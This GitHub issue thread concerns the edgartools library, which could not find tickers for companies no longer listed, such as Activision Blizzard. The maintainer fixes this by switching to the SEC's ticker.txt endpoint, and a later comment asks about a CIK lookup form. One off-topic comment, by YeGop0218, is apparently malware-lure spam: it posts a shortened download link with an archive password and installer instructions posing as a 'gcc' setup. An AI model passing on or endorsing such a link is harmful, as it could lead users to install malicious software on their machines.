### ISSUE TITLE
Unable to get the ticker of companies that no longer exist independently

### ISSUE THREAD

**Issue by AlexanderGallus** [dgunning/edgartools#96]
Hello,

this is neither really an important issue, nor an issue I believe that can be quickly fixed, but I think it is interesting nonetheless:

company = Company("ATVI")
 
returns None on the newest edgartools version 2.28.1. 
 
It is however possible to create a company for Activision Blizzard using the CIK 0000718877 and then fetch filings, but company.tickers is still not available and the ticker has to be manually handled. 

I believe, this has to be due to how tickers are being fetched. I did not fully investigate the code and I could be wrong, but as I understand, you are using the list located at https://www.sec.gov/files/company_tickers.json and Activision Blizzard is no longer in there - which I attribute to the SEC removing it due to Microsoft's acquirement of the company. 

So if I am not mistaken, this means that currently, one is unable to get the ticker for any company that has submitted filings in the past to the SEC, but no longer exists independently via edgartools. 

Best regards,
Alex

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by dgunning** [comment]
That's a good point. edgartools uses that company_tickers.json endpoint to look up the CIK for a given ticker. If the SEC removes a ticker then the lookup will not find the company. 

I am going through other datasets like the company submission json that returns information about a company, but it looks like the ticker for Activision was removed there as well.

Will update you on what I find. Thanks

**Comment by benobytes** [comment]
@dgunning Looks like its still part of the ticker.txt endpoint. https://www.sec.gov/include/ticker.txt

**Comment by dgunning** [comment]
That's gold @benobytes . I am testing a switch to that url

**Comment by dgunning** [comment]
Switched the cik lookup to use the **include/ticker.txt** url which has over 12,000 records compared with over 10,000 for the old one. Importantly **ATVI** and **BRK**  (Berkshire Hathaway) are there so this is an improvement.

I also made it so we can search for **BRK-A**, **BRK.A** or **BRK**

Also added mutual fund ticker lookup, which now works for ETFs, so you can search for a ETF company.

Testing now and will release soon

**Comment by AlexanderGallus** [comment]
> Switched the cik lookup to use the **include/ticker.txt** url which has over 12,000 records compared with over 10,000 for the old one. Importantly **ATVI** and **BRK** (Berkshire Hathaway) are there so this is an improvement.
> 
> I also made it so we can search for **BRK-A**, **BRK.A** or **BRK**
> 
> Also added mutual fund ticker lookup, which now works for ETFs, so you can search for a ETF company.
> 
> Testing now and will release soon

Great news! Looking forward to the commit.

**Comment by dgunning** [comment]
Available now in 2.29.0

**Comment by martin0** [comment]
I concur it's using https://www.sec.gov/include/ticker.txt endpoint.
I'm trying to find ABLV. It's CIK is 1957489 according to interactive search (https://www.sec.gov/search-filings)
Interestingly, following the "CIK lookup info" on that page (https://www.sec.gov/search-filings/cik-lookup), has a web form that implies a POST to /cgi-bin/cik-lookup will do the trick

`<**form action="/cgi-bin/cik_lookup" class="usa-form" method="POST"**>
<div class="form-item">
<div class="inline-form" style="display: grid; align-items: end; gap: 0 12px; grid-template-columns: [ first ] auto [ second ] 100px;"><input aria-invalid="false" aria-required="true" class="usa-input" **id="company" name="company"** placeholder="Name" size="40" type="text"><button class="collapsed-submit usa-button" type="submit">Search</button></div>
</div>

<div class="element-description usa-hint"><strong>NOTE:</strong> The name may be listed differently than expected.

<ul class="grey-square">
	<li class="grey-square">the (fictitious) "John Smith" might be "Smith John"</li>
	<li class="grey-square">"ABC Company" may well be abbreviated as "ABC CO" (with no period at the end)</li>
</ul>
</div>
</form>`
